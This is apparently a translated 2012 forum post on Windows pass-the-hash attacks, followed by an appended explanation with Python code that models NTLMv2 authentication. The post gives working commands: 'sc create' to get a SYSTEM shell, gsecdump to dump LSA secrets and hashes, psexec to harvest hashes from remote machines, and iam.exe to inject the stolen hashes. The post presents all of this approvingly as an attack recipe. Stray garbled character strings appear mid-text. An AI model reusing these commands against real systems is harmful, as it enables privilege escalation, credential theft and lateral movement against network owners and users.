HASH injection attack

Posted 2012-11-6 21:09:29
To get a DOS prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS
9 ]: V7 d+ t  Z7 R+ e( I
------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD
& A& ?, o% V! T
Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the cached credentials, because these hashes are LM hashes that can be easily broken with rainbow tables.

A tip: you can use iam from the pshtools toolkit to inject the HASH information just grabbed with gsecdump into the local lsass process, which carries out the hash injection attack. The foreigners really are good at this; administrators are going to be kept busy now. The LM/NT hashes obtained during ARP spoofing, or those obtained with gethash, actually never need to be cracked at all; this is purely a matter of using the tool. As the original article puts it well: no matter whether the password is 4 characters or 127 characters, once you have the hash it is 100% done.

Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
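The post above dumps hashes from logon sessions and then injects them with iam. The reason that works is that NTLM authentication never uses the password itself, only the NT hash (MD4 of the UTF-16LE password), so a hash lifted from memory is a full password equivalent whatever the password's length. The following is an added worked example, not code from the post or from the truesec article, that shows this at the NTLMv2 protocol level in Python: a client holding only a stolen NT hash builds a valid NtChallengeResponse, and the verifying side accepts it using its own copy of the hash. The user name, domain, server challenge, client nonce, timestamp and target-info blob are constructed values; MD4 is implemented inline because hashlib.new("md4") is missing on many OpenSSL 3 builds. (Two notes on the transcript itself: the 1053 error from sc start is expected, since cmd.exe never reports back to the service control manager, but the interactive console window has already been spawned by then; and the trick relies on services sharing the console session as on XP/2003, whereas from Vista on session 0 isolation keeps that window off the user's desktop.)

```python
"""Added example: why a stolen NT hash is a password equivalent (pass-the-hash).

NTLM never touches the password, only NT = MD4(UTF-16LE(password)), so whoever
holds the 16-byte hash (from gsecdump -u, a memory dump, ...) can answer the
server's challenge exactly like the legitimate user. All names, challenges and
nonces below are constructed; MD4 is inline because hashlib.new("md4") is
unavailable on many OpenSSL 3 builds.
"""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, the primitive behind the NT hash."""
    rotl = lambda v, n: ((v << n) | (v >> (32 - n))) & MASK
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)            # bit length, little-endian
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i, s in zip(range(16), [3, 7, 11, 19] * 4):
            a, b, c, d = d, rotl((a + f(b, c, d) + x[i]) & MASK, s), b, c
        for i, s in zip([0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15],
                        [3, 5, 9, 13] * 4):
            a, b, c, d = d, rotl((a + g(b, c, d) + x[i] + 0x5A827999) & MASK, s), b, c
        for i, s in zip([0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15],
                        [3, 9, 11, 15] * 4):
            a, b, c, d = d, rotl((a + h(b, c, d) + x[i] + 0x6ED9EBA1) & MASK, s), b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """The NT hash stored in SAM/AD and held in LSASS for every logged-on user."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(nt: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2 (MS-NLMP 3.3.2): keyed with the NT hash, never with the password."""
    return hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_blob(timestamp: int, client_nonce: bytes, target_info: bytes) -> bytes:
    """The 'temp' structure the client MACs together with the server challenge."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_nonce + b"\x00" * 4 + target_info + b"\x00" * 4)


def client_answer(stolen_nt, user, domain, server_challenge, client_nonce, timestamp, target_info):
    """Attacker side: NtChallengeResponse = NTProofStr || blob, from the hash alone."""
    blob = ntlmv2_blob(timestamp, client_nonce, target_info)
    nt_proof = hmac.new(ntowf_v2(stolen_nt, user, domain), server_challenge + blob, hashlib.md5).digest()
    return nt_proof + blob


def server_verify(stored_nt, user, domain, server_challenge, response) -> bool:
    """Verifier side (DC or local SAM): recompute NTProofStr from its own copy of the hash."""
    if len(response) < 16:
        return False
    nt_proof, blob = response[:16], response[16:]
    expected = hmac.new(ntowf_v2(stored_nt, user, domain), server_challenge + blob, hashlib.md5).digest()
    return hmac.compare_digest(nt_proof, expected)


def demo(password: str, stolen_nt: bytes = None) -> bool:
    """Dump-and-replay; stolen_nt defaults to the victim's real hash, as gsecdump -u would yield it."""
    user, domain = "Administrator", "CORP"                  # constructed
    server_challenge = bytes.fromhex("0123456789abcdef")   # constructed 8-byte ServerChallenge
    client_nonce = bytes.fromhex("a1b2c3d4e5f60718")       # constructed 8-byte ClientChallenge
    timestamp = 0x01C7650A7C4A2B80                          # constructed FILETIME
    target_info = (b"\x02\x00\x08\x00" + domain.encode("utf-16-le")   # MsvAvNbDomainName
                   + b"\x00\x00\x00\x00")                               # MsvAvEOL
    stored_nt = nt_hash(password)
    if stolen_nt is None:
        stolen_nt = stored_nt
    response = client_answer(stolen_nt, user, domain, server_challenge, client_nonce, timestamp, target_info)
    return server_verify(stored_nt, user, domain, server_challenge, response)


if __name__ == "__main__":
    print("NT hash of 'password'      :", nt_hash("password").hex())
    print("4-char password, hash only :", demo("abcd"))
    print("127-char password, hash only:", demo("x" * 127))
    print("wrong hash                 :", demo("abcd", nt_hash("other")))
```

Both demo("abcd") and demo("x" * 127) succeed because the verifier only ever compares a 16-byte hash against a 16-byte hash; the password's length affects how hard offline cracking is, not whether the hash can be replayed. The same logic is what iam.exe relies on when it swaps the hash into the local LSASS logon session: every outbound NTLM authentication from that session is then answered with the injected hash.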